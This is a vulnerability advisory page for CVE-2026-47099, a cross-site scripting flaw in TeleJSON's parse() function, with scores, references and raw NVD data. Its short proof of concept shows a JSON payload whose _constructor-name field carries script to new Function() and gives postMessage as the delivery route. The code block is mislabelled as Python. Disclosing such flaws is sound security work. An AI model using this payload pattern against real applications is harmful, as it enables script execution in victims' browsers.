CVE-2026-47099

Description

TeleJSON prior to 6.0.0 contains a DOM-based cross-site scripting vulnerability in the parse() function that allows attackers to execute arbitrary JavaScript by delivering a crafted JSON payload containing a malicious _constructor-name_ property value. The custom reviver passes the constructor name directly to new Function() without sanitization when recreating object prototypes, enabling attackers to inject arbitrary JavaScript through vectors such as postMessage in cross-frame communication contexts to achieve script execution within the application.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TeleJSON < 6.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-47099
// Description: Exploiting TeleJSON DOM-based XSS via _constructor-name

// 1. Attacker creates a malicious JSON payload
// The key is the "_constructor-name" property which gets passed to new Function()
const maliciousPayload = {
    "message": "Hello World",
    "_constructor-name": "alert('CVE-2026-47099 Exploited!'); document.body.style.backgroundColor='red';"
};

// 2. Simulating the vulnerable behavior in TeleJSON < 6.0.0
// The vulnerable parse function uses a reviver that passes the value to new Function()
function vulnerableParse(jsonString) {
    return JSON.parse(jsonString, (key, value) => {
        if (key === '_constructor-name') {
            // Vulnerability: No sanitization before passing to new Function()
            return new Function(value); 
        }
        return value;
    });
}

// 3. Execution
// If the application receives this payload (e.g., via postMessage) and parses it:
console.log("Sending malicious payload...");
// vulnerableParse(JSON.stringify(maliciousPayload)); // This would trigger the XSS

// 4. Real-world vector via postMessage
// window.postMessage(JSON.stringify(maliciousPayload), '*');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-47099
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-47099
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-47099/
[4] VulDB https://vuldb.com/cve/CVE-2026-47099
[5] https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-47099/cve-2026-47099.md
[6] https://github.com/storybookjs/telejson/security/advisories/GHSA-ccgf-5rwj-j3hv
[7] https://www.vulncheck.com/advisories/telejson-dom-based-xss-via-parse-function

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-47099", "sourceIdentifier": "[email protected]", "published": "2026-05-20T20:16:41.063", "lastModified": "2026-05-21T15:19:30.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "TeleJSON prior to 6.0.0 contains a DOM-based cross-site scripting vulnerability in the parse() function that allows attackers to execute arbitrary JavaScript by delivering a crafted JSON payload containing a malicious _constructor-name_ property value. The custom reviver passes the constructor name directly to new Function() without sanitization when recreating object prototypes, enabling attackers to inject arbitrary JavaScript through vectors such as postMessage in cross-frame communication contexts to achieve script execution within the application."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-47099/cve-2026-47099.md", "source": "[email protected]"}, {"url": "https://github.com/storybookjs/telejson/security/advisories/GHSA-ccgf-5rwj-j3hv", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/telejson-dom-based-xss-via-parse-function", "source": "[email protected]"}]}}